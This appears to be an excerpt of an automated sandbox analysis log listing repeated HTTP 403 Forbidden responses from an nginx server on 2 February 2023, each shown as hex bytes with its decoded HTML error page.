            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:40 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:40 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:41 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:41 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:49 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:49 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
